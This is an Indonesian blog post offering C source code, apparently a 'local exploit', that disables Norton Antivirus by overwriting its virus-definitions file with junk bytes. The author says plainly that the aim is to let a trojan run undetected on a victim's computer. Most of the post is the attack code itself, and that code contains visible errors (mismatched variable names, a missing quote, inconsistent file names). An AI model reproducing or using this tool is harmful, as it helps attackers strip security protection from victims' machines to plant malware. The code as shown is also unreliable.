Admin
The Ubuntu Counter Project - user number # 33086 IP free counters
Kamis, 20 Januari 2011

Membunuh Antivirus Norton di Komputer Korban



Dalam meremote dengan trojan,pasti antivirus N--t-n mendetect trojan tersebut,dan setelah saya browsing -browsing.Ternyata saya mendapatkan sebuah code pembunuh antivirus N--t-n dan sejenisnya,Kode script ini akan memaksa antivirus tersebut untuk nonaktif(disable),sehinggaTrojan Kita bisa masuk dan aktif dikomputer korban,memang kode ini sudah lama,tetapi kode ini masih layak untuk dicoba.

Bagi anda yang ingin buat exploit ini silahkan anda ketik sendiri lalu buat file killanvir.exe atau download scriptnya di Sini

inilah kode scriptnya :




//---code----//
/*
Kill Norton Antivirus(all versions).local exploit.
Norton AV can not protect this file:VIRSCAN1.DAT
and can not Detect any virus after modify this file!
(editor:jadi Jalannya neh,file.DAT nya dioverwrite ama data sampah)
*/

#include<windows.h>
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fname[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\
Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
temp=RegQueryValueEx(handle,"CommondFilesDir",0,
&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString("DefDates,"CurDefs","",
dirName,Sizeof(dirName),buff);
if(!strcmp(dirName,""))
return 1;
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
handle=CreateFile(fName,GENERIC_WRITE,FILE_
SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_
ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);

if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
}

0 komentar: